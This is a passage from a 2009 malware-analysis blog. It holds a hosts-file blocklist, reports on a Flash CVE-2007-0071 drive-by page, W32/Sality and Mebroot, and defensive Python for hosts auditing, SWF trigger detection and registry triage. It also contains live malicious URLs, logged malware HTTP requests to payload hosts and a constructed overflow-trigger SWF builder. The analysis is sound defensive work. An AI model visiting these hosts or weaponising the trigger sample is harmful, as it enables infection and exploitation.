127.0.0.1 888.jopenqc.com
127.0.0.1 89382.cn
127.0.0.1 8v8.biz
127.0.0.1 97725.com
127.0.0.1 9gg.biz
127.0.0.1 www.9000music.com
127.0.0.1 test.591jx.com
127.0.0.1 a.topxxxx.cn
127.0.0.1 picon.chinaren.com
127.0.0.1 www.5566.net
127.0.0.1 p.qqkx.com
127.0.0.1 news.netandtv.com
127.0.0.1 z.neter888.cn
127.0.0.1 b.myblank.cn
127.0.0.1 wvw.wokutu.com
127.0.0.1 unionch.qyule.com
127.0.0.1 www.qyule.com
127.0.0.1 it.itjc.cn
127.0.0.1 www.linkwww.com
127.0.0.1 vod.kaicn.com
127.0.0.1 www.tx8688.com
127.0.0.1 b.neter888.cn
127.0.0.1 promote.huanqiu.com
127.0.0.1 www.huanqiu.com
127.0.0.1 www.haokanla.com
127.0.0.1 play.unionsky.cn
127.0.0.1 www.52v.com
127.0.0.1 www.gghka.cn
127.0.0.1 icon.ajiang.net
127.0.0.1 new.ete.cn
127.0.0.1 www.stiae.cn
127.0.0.1 o.neter888.cn
127.0.0.1 comm.jinti.com
127.0.0.1 www.google-analytics.com
127.0.0.1 hz.mmstat.com
127.0.0.1 www.game175.cn
127.0.0.1 x.neter888.cn
127.0.0.1 z.neter888.cn
127.0.0.1 p.etimes888.com
127.0.0.1 hx.etimes888.com
127.0.0.1 abc.qqkx.com
127.0.0.1 dm.popdm.cn
127.0.0.1 www.yl9999.com
127.0.0.1 www.dajiadoushe.cn
127.0.0.1 v.onondown.com.cn
127.0.0.1 www.interoo.net
127.0.0.1 bally1.bally-bally.net
127.0.0.1 www.bao5605509.cn
127.0.0.1 www.rty456.cn
127.0.0.1 www.werqwer.cn
127.0.0.1 1.360-1.cn
127.0.0.1 user1.23-16.net
127.0.0.1 www.guccia.net
127.0.0.1 www.interoo.net
127.0.0.1 upa.netsool.net
127.0.0.1 js.users.51.la
127.0.0.1 vip2.51.la
127.0.0.1 web.51.la
127.0.0.1 qq.gong2008.com
127.0.0.1 2008tl.copyip.com
127.0.0.1 tla.laozihuolaile.cn
127.0.0.1 www.tx6868.cn
127.0.0.1 p001.tiloaiai.com
127.0.0.1 s1.tl8tl.com
127.0.0.1 s1.gong2008.com
127.0.0.1 4b3ce56f9g.3f6e2cc5f0b.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
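A hosts file this size is easier to reason about with a small audit script. The following is an added example, not code from the original post: it parses hosts-file text and tags each entry with what it actually does. HOSTS_SAMPLE is a constructed excerpt of the list above; the tag names and the substring test for CRL/OCSP hosts are this example's own conventions, not anything the sample or a tool defines.

```python
"""Audit a hosts file for the kind of tampering seen in the Trojan.Dropper
report: which names are sinkholed, which entries defeat PKI revocation
checks, and which entries are no-ops.  Added example, not from the post."""
import ipaddress
import re

# Constructed sample: a handful of the entries from the list above.
HOSTS_SAMPLE = """\
127.0.0.1 v.onondown.com.cn
127.0.0.0 fuck.zttwp.cn
127.0.0.0 CSC3-2004-crl.verisign.com
127.0.0.0 121.14.101.68
127.0.0.0 61.128.171.115:8080
127.0.0.1 localhost
127.0.0.1 www.google-analytics.com
127.1.1.1 bnasnd83nd.cn
# a comment line that a parser must skip
"""

LOOPBACK = ipaddress.ip_network("127.0.0.0/8")
# Names containing these markers are CRL/OCSP servers; sinkholing them
# disables certificate revocation checks (assumption: substring match).
PKI_MARKERS = ("crl", "ocsp")
LABEL = r"[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"^{LABEL}(\.{LABEL})*$")


def parse_hosts(text):
    """Yield (address, name) for every non-comment entry; one line may map
    several names to the same address."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *names = line.split()
        for name in names:
            yield addr, name


def classify(addr, name):
    """Return the list of tags describing what this entry does."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return ["unparseable-address"]
    if name.lower() == "localhost":
        return ["localhost"]            # required entry, left intact by the malware
    tags = []
    if ip in LOOPBACK:
        tags.append("sinkholed")
        if ip != ipaddress.ip_address("127.0.0.1"):
            tags.append("nonstandard-loopback")   # 127.0.0.0, 127.1.1.1, ...
    if any(marker in name.lower() for marker in PKI_MARKERS):
        tags.append("blocks-revocation-check")
    # The resolver consults the hosts file only for names, so an IP literal
    # or a name:port string never matches anything: these entries are dead.
    if ":" in name:
        tags.append("no-op-port-suffix")
    else:
        try:
            ipaddress.ip_address(name)
            tags.append("no-op-ip-literal")
        except ValueError:
            if not HOSTNAME_RE.match(name):
                tags.append("invalid-hostname")
    return tags


def audit_hosts(text):
    """Map each name to its tags: a quick IR triage of a modified hosts file."""
    return {name: classify(addr, name) for addr, name in parse_hosts(text)}


if __name__ == "__main__":
    for name, tags in audit_hosts(HOSTS_SAMPLE).items():
        print(f"{name:32} {' '.join(tags)}")
```

Run against the full list, the interesting lines are the ones tagged blocks-revocation-check (only the VeriSign CRL host) and the dead entries: every raw IP and every host:port string in the list has no effect at all, because the hosts file is consulted only when a name is resolved.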

May 14, 2009

Malicious Site containing SWF:CVE-2007-0071

Malicious Site: http://jjxp22.cn/a/iqq.html
Someone submitted this malicious link "http://jjxp22.cn/a/iqq.html" to me. It seems to be a pop-up or hidden link from some compromised sites.

After checking the page source, I found an obfuscated JavaScript (shown below).

Obfuscated JavaScript

I de-obfuscated the JavaScript and found that it uses Deconcept's SWFObject to embed malicious Shockwave Flash files that exploit the integer overflow vulnerability in Adobe Flash Player 9.0.115.0 and earlier (CVE-2007-0071), which allows remote attackers to execute arbitrary code.

The six malicious Flash files referenced in the script exploit the Flash Player and download executables onto the victim's system from various websites.

De-obfuscated JavaScript

Sample Flash file info
###############

Filename: i16.swf
Size: 17897
MD5: 426969FD0D7324EE170D6F46BDB203B6
Virus Found: Bloodhound.Exploit.193 (Symantec)

On the VirusTotal website, 13 out of 39 AV engines detected it (shown below).

VirusTotal

From the whois record, the IP (61.164.108.35) belongs to RuiAn Telecom (China).

Who-is record
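CVE-2007-0071 is an integer overflow in Flash Player's parsing of the SWF DefineSceneAndFrameLabelData tag (tag code 86), where the untrusted SceneCount field is used to size the scene table. A static check for that trigger, written as an added example (not the post's code and not anything from the malicious site): it walks the SWF tag list, handling both uncompressed FWS and zlib-compressed CWS files, and reports any tag 86 whose SceneCount is implausible. The two SWF files it builds are constructed in-memory samples, not i16.swf, and SANE_SCENE_LIMIT is an assumed threshold.

```python
"""Static check for the CVE-2007-0071 trigger in an SWF file: a
DefineSceneAndFrameLabelData tag (code 86) with an absurd SceneCount.
Added example; the SWF samples are constructed here, not the real files."""
import struct
import zlib

TAG_DEFINE_SCENE = 86
SANE_SCENE_LIMIT = 1 << 16     # assumption: no real movie has more scenes


def encode_u32(value):
    """SWF EncodedU32: 7 bits per byte, low bits first, 0x80 = continue."""
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)
        else:
            out.append(byte)
            return bytes(out)


def decode_u32(data, pos):
    """Return (value, new_pos); at most five bytes are consumed."""
    value, shift = 0, 0
    for _ in range(5):
        byte = data[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:
            break
        shift += 7
    return value, pos


def make_tag(code, body):
    """RECORDHEADER: 10-bit tag code, 6-bit length, long form when >= 63."""
    if len(body) < 0x3F:
        return struct.pack("<H", (code << 6) | len(body)) + body
    return struct.pack("<HI", (code << 6) | 0x3F, len(body)) + body


def make_swf(scene_count):
    """Minimal uncompressed SWF (FWS): empty RECT, frame rate and count,
    one DefineSceneAndFrameLabelData tag with one scene, then the End tag."""
    body = encode_u32(scene_count) + encode_u32(0) + b"Scene 1\x00" + encode_u32(0)
    tags = make_tag(TAG_DEFINE_SCENE, body) + make_tag(0, b"")
    # A RECT with Nbits=0 is a single zero byte; frame rate 12.0, one frame.
    payload = b"\x00" + struct.pack("<HH", 12 << 8, 1) + tags
    return b"FWS\x09" + struct.pack("<I", 8 + len(payload)) + payload


def iter_tags(swf):
    """Yield (code, body) for every tag in the movie."""
    sig = swf[:3]
    data = swf[8:]                      # skip Signature, Version, FileLength
    if sig == b"CWS":
        data = zlib.decompress(data)
    elif sig != b"FWS":
        raise ValueError("not an SWF file")
    nbits = data[0] >> 3
    pos = (5 + 4 * nbits + 7) // 8      # RECT is padded to a byte boundary
    pos += 4                            # FrameRate (u16) and FrameCount (u16)
    while pos + 2 <= len(data):
        header = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        code, size = header >> 6, header & 0x3F
        if size == 0x3F:
            size = struct.unpack_from("<I", data, pos)[0]
            pos += 4
        yield code, data[pos:pos + size]
        pos += size
        if code == 0:                   # End tag
            break


def scene_count_findings(swf):
    """Return the SceneCount of every tag 86 that exceeds the sane limit."""
    findings = []
    for code, body in iter_tags(swf):
        if code == TAG_DEFINE_SCENE:
            count, _ = decode_u32(body, 0)
            if count > SANE_SCENE_LIMIT:
                findings.append(count)
    return findings


BENIGN_SWF = make_swf(1)                 # constructed: one scene
SUSPICIOUS_SWF = make_swf(0xFFFFFFFF)    # constructed: overflow-sized count
```

The check is deliberately structural rather than signature-based: it does not matter how the exploit's heap spray or shellcode is encoded, the tag that triggers the bug has to carry the oversized count. Exploit kits of the period shipped the SWF as CWS, so the zlib branch is the one that gets exercised on real samples.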

May 5, 2009

Malware analysis: Trojan W32/Sality

I received a suspicious file from my colleague this morning and did a simple behaviour analysis on it.

Analysis Report:
##############

Filename: ~.exe
MD5: 3A03A20BFEFE3FDD01659D47D2ED76C8
Virus Found: W32/Sality (McAfee), TROJ_DLOADER.XOP (TrendMicro), Mal/Generic-A (Sophos), Trojan-Downloader.Win32.Agent.brxr (Kaspersky, F-Secure)

On the VirusTotal website, 36 out of 40 AV engines detected it.

Registry values added:
================
1>
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"

2> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"

The two values above add the malware to the Windows Firewall exception list under the innocuous name "ipsec". The value format is path:scope:state:name, so "*" means the exception applies to any network and "Enabled" means the firewall will not block connections to the executable.

3>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\24: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00

4>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.xml\1: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00

5>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\~.rkr: 08 00 00 00 06 00 00 00 80 F4 57 31 2D CD C9 01

6>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\@C:\WINDOWS\system32\SHELL32.dll,-22913: "Shows the disk drives and hardware connected to this computer."

7>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\~.exe: "~"

Registry values modified:
==================
1> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000010

2> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000011

3> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe"

4> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe "C:\Documents and Settings\Owner\Desktop\~.exe""

The sample writes its own path into the Winlogon Shell value next to Explorer.exe, a logon-time persistence point that survives a reboot and is easy to miss when only the Run keys and Startup folders are checked.

5> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x00000039

6> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x0000003A

7> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x00000039

8> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000003A
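Most of the lines in a snapshot diff like the ones above are noise; the few that matter are the persistence and defence-evasion changes. The following added example (not the post's code) runs a handful of triage rules over Regshot-style "key: value" lines and keeps only those. DIFF_LINES is a constructed sample copied from this page's reports (the Sality firewall and Winlogon Shell lines, the Trojan.Dropper UPDATEDATA service lines and two noise lines); the rule names and the noise list are this example's own.

```python
"""Triage rules over a Regshot-style registry diff.  Keeps the changes
that mean persistence or defence evasion and drops known noise.
Added example, not from the post; sample lines copied from this page."""
import re

# Constructed sample, copied from the reports on this page.
DIFF_LINES = r"""
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe "C:\Documents and Settings\Owner\Desktop\~.exe""
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\ImagePath: "\??\C:\WINDOWS\system32\drivers\acpiec.sys"
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Start: 0x00000003
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000011
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\SymbolWarningShown: 0x00000001
"""

# Keys that change because of the analysis session, not the sample.
NOISE_RE = re.compile(
    r"\\(Prefetcher|MUICache|ShellNoRoam|UserAssist|Sysinternals|Cryptography\\RNG)\\",
    re.IGNORECASE)
# Service definitions: HKLM\SYSTEM\<control set>\Services\<name>\<property>
SERVICES_RE = re.compile(
    r"^HKLM\\SYSTEM\\(?:CurrentControlSet|ControlSet\d{3})\\Services\\([^\\]+)\\(ImagePath|Type|Start)$",
    re.IGNORECASE)
SERVICE_KERNEL_DRIVER = "0x00000001"


def parse_line(line):
    """Split 'key: value'; the first ': ' ends the key (registry paths never
    contain ': ' because a drive letter is followed by a backslash)."""
    key, _, val = line.partition(": ")
    if val.startswith('"') and val.endswith('"'):
        val = val[1:-1]
    return key, val


def triage(lines):
    """Return [(rule, detail)] for the lines that matter."""
    findings = []
    services = {}
    for line in lines.strip().splitlines():
        key, val = parse_line(line)
        if NOISE_RE.search(key):
            continue
        if "\\FirewallPolicy\\" in key and "\\AuthorizedApplications\\List\\" in key:
            # value format: path:scope:state:display-name
            path, scope, state, name = val.rsplit(":", 3)
            findings.append(("firewall-exception",
                             f"{path} allowed ({state}, scope {scope}) as '{name}'"))
        elif key.lower().endswith("\\winlogon\\shell") and val.strip().lower() != "explorer.exe":
            findings.append(("winlogon-shell-hijack", val))
        match = SERVICES_RE.match(key)
        if match:
            services.setdefault(match.group(1), {})[match.group(2)] = val
    for name, props in services.items():
        if props.get("Type") == SERVICE_KERNEL_DRIVER:
            findings.append(("new-kernel-driver",
                             f"{name} -> {props.get('ImagePath', '?')} (Start={props.get('Start', '?')})"))
    return findings


if __name__ == "__main__":
    for rule, detail in triage(DIFF_LINES):
        print(f"[{rule}] {detail}")
```

The service rule is the one worth extending first: a kernel driver (Type 1) whose image sits outside the usual driver locations, or whose name shadows a legitimate one as PCIDump does in the Trojan.Dropper report, is a rootkit until proven otherwise.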

Files modified:
==========
1> C:\Documents and Settings\Owner\Cookies\index.dat

2> C:\Documents and Settings\Owner\Local Settings\History\History.IE5\index.dat

3> C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\index.dat

4> C:\WINDOWS\system.ini

5> C:\WINDOWS\system32\config\software.LOG

6> C:\WINDOWS\system32\config\system.LOG

Other behaviours:
=============
System connecting to:
1> peskostruikaz.com:80
The following HTTP request found:
GET /auq.php?8e54ce=1332546&id=2554099245826 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57
Host: peskostruikaz.com
Cache-Control: no-cache


2> johnsonbodyshop.com:80
No request after initial handshake.

3> shopatforgetmenot.com:80
The following HTTP request found:
GET /images/mainlogo.gif?58fb0a=833062&id=2554099245826 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57
Host: shopatforgetmenot.com
Cache-Control: no-cache

4> corporateshelters.com:80
No request after initial handshake.

The malware seems to be trying to download a further payload from "peskostruikaz.com/auq.php" and "shopatforgetmenot.com/images/mainlogo.gif". Two details are useful as network signatures: the same id=2554099245826 value appears in both requests, which suggests a per-victim identifier, and the hard-coded User-Agent (MSIE 6.0 on Windows NT 5.0 claiming to be Opera 8.57) does not match the Windows XP analysis machine.

Apr 28, 2009

Malicious Website: u-toys.com

U-toys.com

This website, "www.u-toys.com", was forwarded to me by commandrine as a suspicious website. While accessing the website, there seems to be a JavaScript running. Checking the page source (HTML code), there is an obfuscated JavaScript (shown below). It seems to have been created by some JavaScript obfuscator application that I am not able to de-obfuscate.

Obfuscated Javascript

After doing some behaviour analysis on the JavaScript, it seems to be exploiting some Internet browser vulnerabilities. It manages to drop an executable file into the C:\ folder on an older, unpatched browser; on a newly patched browser no "injected" files are found. Below is the analysis of the executable file.

Analysis Report:
##############

Filename: b01kyk.exe
Size: 327680
MD5: 615A8484F113DA99D2C172A44C9E7D31
Virus found: Trojan:W32/Mebroot.gen!A (F-Secure)

On the VirusTotal website, 11 out of 38 AV engines detected it (shown below); well-known engines such as Symantec and McAfee did not.

VirusTotal

Registry values added:
================
1> HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 44 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 63 3A 5C 64 6F 63 75 6D 65 7E 31 5C 6F 77 6E 65 72 5C 6C 6F 63 61 6C 73 7E 31 5C 74 65 6D 70 5C 65 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 57 49 4E 44 4F 57 53 5C 54 45 4D 50 5C 46 2E 74 6D 70 00 00 00

2> HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 44 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 63 3A 5C 64 6F 63 75 6D 65 7E 31 5C 6F 77 6E 65 72 5C 6C 6F 63 61 6C 73 7E 31 5C 74 65 6D 70 5C 65 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 57 49 4E 44 4F 57 53 5C 54 45 4D 50 5C 46 2E 74 6D 70 00 00 00

3> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\o01xlx.rkr: 0B 00 00 00 06 00 00 00 00 78 6B 45 46 D4 C9 01

4> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\b01kyk.exe: "b01kyk"

Registry values modified:
==================
1> HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent\: 0x0000000B

2> HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent\: 0x0000000C

3> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 0B 00 00 00 7F 00 00 00 70 D2 53 1A 46 D4 C9 01

4> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 0B 00 00 00 80 00 00 00 20 91 5F 45 46 D4 C9 01

5> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 0B 00 00 00 D3 00 00 00 20 5B 70 1A 46 D4 C9 01

6> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 0B 00 00 00 D4 00 00 00 00 78 6B 45 46 D4 C9 01
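Two of the raw-hex values that appear in both this report and the Trojan.Dropper report above are worth decoding rather than eyeballing: Session Manager\PendingFileRenameOperations (which files get renamed or deleted at the next boot; here Mebroot queues its own dropper b01kyk.exe and several temp files for deletion) and the Explorer UserAssist entries (ROT13-obscured program path, a run counter and the FILETIME of the last run). The following is an added example, not the post's code. The hex dumps are copied from the two reports as the snapshot tool printed them (it prints REG_MULTI_SZ as single bytes); the assumption that the Windows XP UserAssist counter starts at 5 is the only interpretation added here.

```python
"""Decode two raw-hex registry values from the behaviour reports on this
page: PendingFileRenameOperations and UserAssist.  Added example, not the
post's code; sample dumps copied from the Trojan.Dropper and Mebroot reports."""
import codecs
import struct
from datetime import datetime, timedelta

# Constructed samples (copied from the reports above).
PFRO_DROPPER = ("5C 3F 3F 5C 63 3A 5C 77 69 6E 64 6F 77 73 5C 73 79 73 74 65 6D 33 32 "
                "5C 64 72 69 76 65 72 73 5C 4F 4C 44 35 2E 74 6D 70 00 00 00")
PFRO_MEBROOT = (
    "5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 "
    "6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 "
    "78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C "
    "4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 44 2E 74 6D 70 00 00 5C 3F 3F 5C 43 "
    "3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F "
    "77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C "
    "3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C "
    "53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 "
    "55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C "
    "45 2E 74 6D 70 00 00 5C 3F 3F 5C 63 3A 5C 64 6F 63 75 6D 65 7E 31 5C 6F 77 6E "
    "65 72 5C 6C 6F 63 61 6C 73 7E 31 5C 74 65 6D 70 5C 65 2E 74 6D 70 00 00 5C 3F "
    "3F 5C 43 3A 5C 57 49 4E 44 4F 57 53 5C 54 45 4D 50 5C 46 2E 74 6D 70 00 00 00")
UA_NAME = r"HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\1.rkr"
UA_VALUE = "09 00 00 00 06 00 00 00 F0 8C 78 3B 88 E9 C9 01"

FILETIME_EPOCH = datetime(1601, 1, 1)
XP_USERASSIST_BASE = 5      # assumption: XP stores (number of runs + 5)


def hex_to_bytes(dump):
    return bytes.fromhex(dump.replace(" ", ""))


def multi_sz(raw, encoding="latin-1"):
    """Split a REG_MULTI_SZ body into its NUL-terminated strings."""
    strings, pos = [], 0
    while pos < len(raw):
        end = raw.index(b"\x00", pos)
        strings.append(raw[pos:end].decode(encoding))
        pos = end + 1
    return strings


def pending_file_renames(dump):
    """Return [(source, destination)] pairs.  A destination of None means
    'delete at boot' (MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT and a
    NULL new name); an empty source string terminates the list."""
    strings = multi_sz(hex_to_bytes(dump))
    ops, i = [], 0
    while i + 1 < len(strings) and strings[i]:
        src, dst = strings[i], strings[i + 1]
        ops.append((src, dst or None))
        i += 2
    return ops


def userassist(name, value_hex):
    """Decode a UserAssist Count entry: ROT13 name, then a 16-byte value
    of session id (u32), counter (u32) and last-run FILETIME (u64)."""
    clear = codecs.decode(name, "rot13")
    session, count, filetime = struct.unpack("<IIQ", hex_to_bytes(value_hex))
    last_run = FILETIME_EPOCH + timedelta(microseconds=filetime // 10)
    return {"name": clear, "session": session,
            "runs": count - XP_USERASSIST_BASE, "last_run": last_run}


if __name__ == "__main__":
    for src, dst in pending_file_renames(PFRO_MEBROOT):
        print("delete at boot:" if dst is None else f"rename to {dst}:", src)
    print(userassist(UA_NAME, UA_VALUE))
```

Decoded, the Mebroot value is seven delete-at-boot entries (the dropper twice, D.tmp, E.tmp three times under different spellings and F.tmp) and no renames, which is the dropper cleaning up after itself; the Trojan.Dropper entry deletes drivers\OLD5.tmp. The UserAssist value records 1.exe run once, in session 9, at 2009-06-10 04:59:27 UTC, which lines up with the date of that post.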

w01f advises: always keep your Internet browser patched, and beware of suspicious scripts and pop-ups running on websites.

Other reports on this site:
- Security Republic - Innocent???

Mar 27, 2009

Welcome

This site was created to provide a platform for anyone to share their ideas, experiences and findings on malware analysis. Feel free to comment or e-mail me any suspicious files.

Mar 22, 2009

Info on Conficker

Found some excellent write-ups on the Conficker worm by the researchers at SRI International. They are among the best analyses of the malware so far. You can find those reports from the links below.

- An Analysis of Conficker
- Addendum on Conficker C

There is further malware information at the SRI Malware Threat Center.